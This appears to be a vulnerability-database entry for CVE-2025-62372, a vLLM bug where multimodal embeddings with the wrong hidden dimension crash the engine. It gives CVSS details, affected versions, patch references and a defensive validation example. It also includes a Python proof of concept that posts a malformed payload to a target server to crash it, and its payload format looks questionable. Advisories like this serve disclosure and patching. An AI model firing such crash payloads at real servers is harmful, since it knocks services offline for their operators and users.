Security Vulnerability Report
CVE-2025-62372 CVSS 6.5 MEDIUM

CVE-2025-62372

Published: 2025-11-21 02:15:43
Last Modified: 2025-12-04 17:40:47

Description

vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, users can crash the vLLM engine serving multimodal models by passing multimodal embedding inputs with correct ndim but incorrect shape (e.g. hidden dimension is wrong), regardless of whether the model is intended to support such inputs (as defined in the Supported Models page). This issue has been patched in version 0.11.1.
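As an added illustration (not vLLM's own code and not a reproduction of its patch), the standalone Python below contrasts an input check that inspects only ndim with one that also pins the trailing hidden dimension, using nested lists as a stand-in for tensors; the EmbeddingSpec, shape_of, validate_* and accepts names are assumptions.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class EmbeddingSpec:
    """Shape a multimodal embedding must have (assumed stand-in, not vLLM's own type)."""
    hidden_size: int  # hidden dimension the model's projector expects
    ndim: int = 2     # (num_tokens, hidden_size)

def shape_of(tensor) -> tuple:
    """Infer the shape of a nested-list tensor stand-in, rejecting ragged or empty nesting."""
    if not isinstance(tensor, list):
        return ()
    if not tensor:
        raise ValueError("empty dimension")
    inner = {shape_of(elem) for elem in tensor}
    if len(inner) != 1:
        raise ValueError("ragged tensor")
    return (len(tensor),) + inner.pop()

def validate_ndim_only(tensor, spec: EmbeddingSpec) -> tuple:
    """Weak check: only ndim is verified, so a (1, 512) embedding passes for a 768-wide model."""
    shape = shape_of(tensor)
    if len(shape) != spec.ndim:
        raise ValueError(f"expected {spec.ndim}-D embedding, got {len(shape)}-D")
    return shape

def validate_full_shape(tensor, spec: EmbeddingSpec) -> tuple:
    """Hardened check: ndim and the trailing hidden dimension must both match the model."""
    shape = validate_ndim_only(tensor, spec)
    if shape[-1] != spec.hidden_size:
        raise ValueError(f"hidden size {shape[-1]} != model hidden size {spec.hidden_size}")
    return shape

def accepts(check, tensor, spec: EmbeddingSpec) -> bool:
    """True if `check` would let the tensor reach the engine, False if it is rejected up front."""
    try:
        check(tensor, spec)
    except ValueError:
        return False
    return True

# Constructed sample inputs aimed at a model with hidden size 768
SPEC_768 = EmbeddingSpec(hidden_size=768)
BAD_EMBEDDING = [[0.0] * 512]       # right ndim, wrong hidden dimension
GOOD_EMBEDDING = [[0.0] * 768] * 3  # shape (3, 768)
```

The ndim-only check lets BAD_EMBEDDING through to the engine, which is the failure mode described above; the full-shape check rejects it before any kernel sees it.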

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:* - VULNERABLE
vLLM >= 0.5.5 and < 0.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-62372 PoC - vLLM Multimodal Embedding Crash
# Target: vLLM server with multimodal model support

def crash_vllm_engine(target_url, model_name):
    """
    PoC to crash vLLM engine by sending malformed multimodal embedding inputs.
    The input has correct ndim but incorrect shape (wrong hidden dimension).
    """
    # Craft malformed multimodal embedding with correct ndim but wrong shape
    payload = {
        "model": model_name,
        "inputs": {
            "data": "base64_encoded_multimodal_data",
            "embedding": {
                "ndim": 2,           # Correct ndim
                "shape": [1, 512],   # Wrong hidden dimension (should be 768 or model expected size)
                "dtype": "float32"
            }
        }
    }
    headers = {
        "Content-Type": "application/json"
    }

    # Send malicious request
    try:
        response = requests.post(
            f"{target_url}/v1/embeddings",
            json=payload,
            headers=headers,
            timeout=30
        )
        print(f"Response status: {response.status_code}")
        print(f"Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed (engine may have crashed): {e}")

# Usage
# target_url = "http://target-vllm-server:8000"
# model_name = "llava-1.5-7b-hf"
# crash_vllm_engine(target_url, model_name)

References

https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b (Patch)
https://github.com/vllm-project/vllm/pull/27204 (Issue Tracking, Patch, Vendor Advisory)
https://github.com/vllm-project/vllm/pull/6613 (Issue Tracking)
https://github.com/vllm-project/vllm/security/advisories/GHSA-pmqf-x6x8-p7qw (Mitigation, Vendor Advisory)

Weakness

CWE-129 (Secondary)

CVSS 4.0 (Secondary)

Score: 8.3 HIGH
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

CVSS 3.1 (Primary): exploitability score 2.8, impact score 3.6

Record status: Analyzed